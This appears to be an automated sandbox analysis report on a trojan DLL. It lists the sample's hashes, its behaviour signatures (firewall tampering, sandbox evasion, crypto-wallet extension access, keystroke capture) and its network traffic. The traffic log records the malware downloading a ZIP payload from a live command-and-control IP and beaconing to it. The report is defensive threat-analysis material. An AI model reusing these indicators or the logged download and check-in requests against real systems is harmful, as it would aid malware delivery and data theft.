Windows Analysis Report
T8TY28UxiT.dll

Overview

General Information

Sample name:	T8TY28UxiT.dll renamed because original name is a hash value
Original sample name:	e0fa9d4894017e66af927bd72df16793.dll
Analysis ID:	1528465
MD5:	e0fa9d4894017e66af927bd72df16793
SHA1:	b504698acb8d172488277c4fc24a819b1009fdf3
SHA256:	fca664019d4465e2f9382c47da8acdf6739ee598191bd748c836a5f752031ad2
Tags:	32dllexetrojan
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Modifies the windows firewall

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to access browser extension known for cryptocurrency wallets

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses ipconfig to lookup or modify the Windows network settings

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: T8TY28UxiT.dll

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C8201F0 BCryptGenRandom,SystemFunction036,

12_2_6C8201F0

Source: ybtrrus.exe

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

Uses 32bit PE files

Source: T8TY28UxiT.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: T8TY28UxiT.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: g2m.pdb source: rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: rundll32.exe, 0000000C.00000003.1880320269.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934185341.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000002.2706441073.000000006FE65000.00000002.00000001.01000000.00000008.sdmp, ybtrrus.exe, 00000021.00000002.2704695699.000000006EA25000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C831F00 CloseHandle,memset,FindFirstFileW,FindClose,	12_2_6C831F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8316F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,	12_2_6C8316F0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4C2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,	28_2_6FE4C2D0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545FB74 FindFirstFileW,FindClose,	28_2_0545FB74
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545F590 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	28_2_0545F590
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05467CC6 FindFirstFileW,	28_2_05467CC6

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467DCE GetLogicalDriveStringsW,

28_2_05467DCE

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_75dffb69-1a82-4980-a5db-ce9131bf24b7\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_17fea6c8-cf23-47b2-9980-606d9795cdc0\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 147.45.116.5 80

Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /index.php?user-PC HTTP/1.1accept: /host: 147.45.116.5

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View	IP Address: 128.138.140.44 128.138.140.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C829F50 recv,WSAGetLastError,

12_2_6C829F50

Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /index.php?user-PC HTTP/1.1accept: /host: 147.45.116.5

Source: unknown

HTTP traffic detected: POST /Telemetry.Request HTTP/1.1Connection: Keep-AliveUser-Agent: MSDWMSA_DeviceTicket: t=EwC4AlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAXBrTo6GpVG+a/F07nLY4GwrROiHN3GVqlB2N3du6sxXuKsMQ1130qDvTz+q2HBXpFGc3PiHCZemHYSb8zJL/iLm/5Et8cElx68GAzWGPwtbxSbc9ME2j414o08EGJbvauYNRd0dSt1+6yFFoEyl6pK2doAkX2AoEUvErkNXG/Vbr5g+OA7TQBJXD8hbEmP+sVb1d+RplEZOTiQO8mcnTQpFYuKBfztbYOqMPDpj66DZCZZXpUP/X36i6CGfWXWD3UWG6rk2de44YyrFwFCPMvjEByEfDEtZraYWJ59q82cb9v+7CO7yJ+rnvg87IsbQ2n+qjhHBLAi8ZawAPpvCsyIQZgAAEC3HA6pDPcB69DpBE+pZV/iAAX8LoENP47Jn3JWABHPXLh9eXapQG9//YtH0pfnVyO2E0kPsobnWZPxmLQGSfNy5A6IeGmPpT10ihk2JbwG5qYSSq87pJa11+gM4hoqQIlqAZCRwFqrZGgETeevsscJfkwggkFhRBgqmkd0d6tpe3CllLw35YmoCyie1TKR0BHYziqMcwclyCx5i++fm2nLq5er4D22Woypix44QWP1jjwlCQIAsAoGHBmFYrUu8/qLjJpz5/DKDgvu0IkP8emsBp23YKdqbfTaVPf5REEfn+deZrhdg2GeidPQGePkTEzE3KYGhFdw+Cph2bD9ubZoLBdc/U+2yKEI411BlhmLH3S2lgmL4j6avNbZ/E2A7DoZk02rLajyUy7UAB+IU46PNidlW3r5tHdNPVzwS3TfDK1iDYrnqP8BAZ+Fk7xJcj6C7CmYS+z0djTdloyO2OqdLtyDtFcxrzObaGcF4F/+VAnX07GOSD1e+PmRK+mCINixNM30S5nPkAK/ldw6dzIhi6LUB&p=Content-Length: 4658Host: umwatson.events.data.microsoft.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>

Source: rundll32.exe, rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll	String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zip
Source: rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zipc
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/index.php
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/index.php?user-PC
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/index.phpxU_
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://code.google.com/p/swfobject/
Source: rundll32.exe, 0000000C.00000002.1907873298.000000000316D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA.crl0q
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://dev.w3.org/html5/websockets/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://fontawesome.io
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://fontawesome.io/license/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gimite.net/en/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://javascript.crockford.com/jsmin.html
Source: rundll32.exe, 0000000C.00000002.1907873298.000000000316D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0&
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6455
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.embarcadero.com/products/delphi
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.esegece.com
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000001C.00000002.2653315436.00000000029BE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2124550236.0000000002A0E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.foolabs.com/xpdf
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ghisler.com/plugins.htm
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000006B57000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000001C.00000002.2691639077.00000000077AC000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.0000000006C67000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.000000000777C000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.000000000661F000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000002F.00000003.2048238374.000000000779C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: rundll32.exe, 0000000C.00000003.1881319232.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com.
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2123620807.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000003.1998212742.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php(E~
Source: ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.phpiE
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%d
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%dS
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.php
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/support.php
Source: ybtrrus.exe, 00000021.00000002.2653795251.0000000002BA3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002AA3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade0
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade6%
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradeeow.a
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradeite
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/v3formats
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002AA3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002BA3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2124550236.0000000002B10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.secureblackbox.com
Source: ybtrrus.exe, 0000002F.00000002.2124550236.0000000002B10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.secureblackbox.com1)
